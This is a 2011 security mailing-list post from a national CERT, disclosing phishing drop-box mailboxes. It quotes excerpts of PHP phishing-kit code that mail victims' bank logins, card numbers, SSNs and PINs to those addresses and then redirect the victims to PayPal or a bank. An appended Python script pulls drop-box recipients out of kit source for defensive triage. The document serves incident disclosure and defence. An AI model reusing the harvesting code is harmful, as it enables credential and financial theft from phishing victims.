[nsp-sec] phishing dropboxes at gmail.com / yahoo.com / ymail.com
Rodolfo Baader
rbaader at arcert.gov.ar
Fri Jan 21 13:51:11 EST 2011
Hi!
While investigating a phishing case, we've found the following drop boxes:
gmail -> "zmetea at gmail.com"
yahoo -> "redytza at yahoo.com"
ymail -> "global.spun at ymail.com"
Evidence:
==============================================================================
[1] (...)
$to = "zmetea at gmail.com,redytza at yahoo.com";
//-----------------------------------
$Security_Num2 = $_POST['Security_Num2'];
$DOB = $_POST['DOB'];
$Security_Num = $_POST['Security_Num'];
$ip = $_SERVER['REMOTE_ADDR'];
$subj = "($ip)IB: $Security_Num2 DOB: $DOB NUM: $Security_Num";
$msg = "ID : $Security_Num2\nYour Date of birth : $DOB\nYour Security Number :
$Security_Num\nip : $ip";
$from = "FROM:Login at resultz.com";
(...)
[2] (...)
//sending email info here
$subj = "[ $card | $cvv | $expm\$expy ]";
$msg = "CardHolder Name: $name\nDate of Birth: $a/$b/$c\nSocial Security Number:
$ssn\nMother Maiden Name: $masa\nAddress: $address\nTown/City:
$city\nProvince/Region: $state\nPostal Code: $zip\nCountry: $country\nPhone
Number: $phone\nPayPal Email: $emailp\nPayPal Password: $emailpwd\nBank Name:
$bank\nDebit / Credit Card Number: $card\nExpiration Date: $expm/$expy\nCard
Verification Number: $cvv\nPIN: $pin\nSort Code: $sort\nAccount Number:
$acc\nVBV Password: $vbv\n\n[IP: $ip | Date: $date ]";
$from = "From: TheMentor<ppl at hi5.com>";
mail("global.spun at ymail.com", $subj, $msg, $from);
header("Location: https://www.paypal.com/");
(...)
[3] (...)
//sending email info here
$subj = "User: $user | ip: $ip ";
$msg = "UserName: $user
Mother maiden name: $mother
Your password: $pass
Memorable address or place: $address
Memorable year: $year
[IP: $ip | Date: $date ]";
$from = "From: cahoot<cahoot at uk.com>";
mail("zmetea at gmail.com,redytza at yahoo.com", $subj, $msg, $from);
header("Location:
https://www.cahoot.com/ibank/core_banking/logout/logged_out.html");
(...)
==============================================================================
Regards,
R.
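
For triage of similar kits, the following added example (not part of the original message) pulls drop-box recipients out of PHP kit source by resolving the first argument of each mail() call, so the forged From header is not reported as a drop box. The sample kit text and its example.* addresses are constructed, and the function names are hypothetical.

```python
import re

# Constructed sample shaped like the excerpts above; all addresses are placeholders.
SAMPLE_KIT = r'''
$to = "drop1@example.com,drop2@example.org";
$from = "From: Support<spoofed@example.net>";
mail($to, $subj, $msg, $from);
mail("drop3@example.net", $subj, $msg, $from);
'''

EMAIL = re.compile(r'[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}')
# $name = "literal";  (single- or double-quoted string assignments only)
ASSIGN = re.compile(r'\$(\w+)\s*=\s*(["\'])(.*?)\2\s*;', re.S)
# First argument of mail(): either a variable or a quoted literal
MAIL_CALL = re.compile(r'\bmail\s*\(\s*(\$\w+|"[^"]*"|\'[^\']*\')', re.I)


def deobfuscate(text):
    """Undo list-archive masking ('user at host.tld') so addresses match.

    Heuristic: any 'word at host.tld' is rewritten, so run it on code, not prose.
    """
    return re.sub(r'(?<=[\w.])\s+at\s+(?=[\w-]+\.[\w.-]+)', '@', text)


def extract_dropboxes(php_source):
    """Return the sorted, de-duplicated recipient addresses of mail() calls."""
    src = deobfuscate(php_source)
    # Last assignment wins; enough for the flat scripts these kits use.
    variables = {name: value for name, _quote, value in ASSIGN.findall(src)}
    found = set()
    for arg in MAIL_CALL.findall(src):
        if arg.startswith("$"):
            value = variables.get(arg[1:], "")  # unresolved variable -> nothing
        else:
            value = arg[1:-1]                   # strip the surrounding quotes
        found.update(addr.lower() for addr in EMAIL.findall(value))
    return sorted(found)


if __name__ == "__main__":
    for address in extract_dropboxes(SAMPLE_KIT):
        print(address)
```

Recipients built by concatenation or decoded at run time are not resolved by this static pass and need manual review.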